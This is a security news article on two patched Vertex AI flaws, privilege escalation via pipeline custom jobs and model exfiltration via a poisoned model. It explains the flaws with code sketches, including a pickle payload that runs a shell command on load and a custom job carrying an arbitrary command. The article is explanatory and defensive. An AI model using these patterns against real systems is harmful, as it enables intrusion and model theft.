Critical Flaws in Google’s Vertex AI Could Let Attackers Steal Machine Learning Models

Security Vulnerabilities Found in Google’s Vertex AI Platform

Palo Alto Networks Unit 42 researchers have discovered two significant security flaws in Google’s Vertex AI machine learning platform:

1. Privilege Escalation Vulnerability:

– Exploits the Vertex AI Pipelines feature through specially crafted custom jobs (see the sketch after this list)

– Allows unauthorized access to restricted resources

– Enables attackers to create backdoor access using reverse shells

– Permits access to internal Google Cloud repositories
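Unit 42 does not publish exploit code, but the general shape of the vector is visible in the public Vertex AI SDK: a custom job runs whatever command its container spec declares, under whichever service account is attached to it. The following is a minimal, hypothetical sketch (project, region, bucket, image, service account, and command are placeholders, not the researchers' payload) of why an over-permissive service account on a pipeline custom job amounts to arbitrary code execution with that account's privileges.

```python
# Minimal sketch: a Vertex AI custom job executes the command declared in its
# container spec under the attached service account. All names are placeholders.
from google.cloud import aiplatform

aiplatform.init(
    project="my-project",
    location="us-central1",
    staging_bucket="gs://my-staging-bucket",  # placeholder bucket for job artifacts
)

job = aiplatform.CustomJob(
    display_name="innocuous-looking-job",
    worker_pool_specs=[
        {
            "machine_spec": {"machine_type": "n1-standard-4"},
            "replica_count": 1,
            "container_spec": {
                "image_uri": "us-docker.pkg.dev/my-project/repo/image:latest",
                # Whatever is placed here runs with the job's permissions;
                # an attacker could substitute a reverse-shell payload.
                "command": ["/bin/sh", "-c", "id && env"],
            },
        }
    ],
)

# The job inherits the permissions of this service account, which is why
# least-privilege accounts matter for pipeline custom jobs.
job.run(service_account="pipeline-runner@my-project.iam.gserviceaccount.com")
```

If the attached service account carries broad roles, commands run this way can reach the same resources the account can, which is the escalation path the researchers describe.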

2. Model Exfiltration Vulnerability:

– Involves deploying a poisoned model that opens a reverse shell once loaded (illustrated after this list)

– Enables unauthorized access to Kubernetes clusters

– Allows extraction of sensitive ML models and fine-tuned LLMs

– Could compromise entire AI environments through a single malicious model
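The report does not spell out the exact loading mechanism, so the following is a generic, hypothetical illustration, assuming a pickle-serialized artifact (one of several unsafe model formats), of why deploying an untrusted model is equivalent to running its author's code inside the serving environment.

```python
# Generic illustration (not Unit 42's exact technique): a pickle-based model
# artifact can embed code that runs the moment the serving environment loads it.
import pickle


class PoisonedModel:
    def __reduce__(self):
        import os
        # On unpickling, this executes with the serving container's permissions;
        # a real attacker would open a reverse shell instead of echoing a message.
        return (os.system, ("echo arbitrary code ran during model load",))


# "Attacker" side: package the payload as a model artifact.
with open("model.pkl", "wb") as f:
    pickle.dump(PoisonedModel(), f)

# "Victim" side: the serving environment loads the artifact...
with open("model.pkl", "rb") as f:
    pickle.load(f)  # ...and the embedded command executes immediately.
```

Once attacker code runs inside the serving container, whatever credentials and network routes that container holds, including access to the underlying Kubernetes cluster and other deployed models, become reachable as well, which is how a single malicious model can compromise the wider environment.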

Impact and Resolution:

– Potential for serious data breaches and intellectual property theft

– Both vulnerabilities have since been patched by Google

– Organizations advised to implement strict model deployment controls

– Regular permission audits recommended (a minimal audit sketch follows below)
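As a starting point for such audits, the sketch below (the project ID is a placeholder) lists every IAM binding on a project using the Resource Manager client, so over-privileged pipeline or serving service accounts stand out.

```python
# Sketch of a basic permission audit: print every IAM binding on a project
# so over-privileged service accounts can be reviewed. Project ID is a placeholder.
from google.cloud import resourcemanager_v3

client = resourcemanager_v3.ProjectsClient()
policy = client.get_iam_policy(request={"resource": "projects/my-project"})

for binding in policy.bindings:
    print(binding.role)
    for member in binding.members:
        print("   ", member)
```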
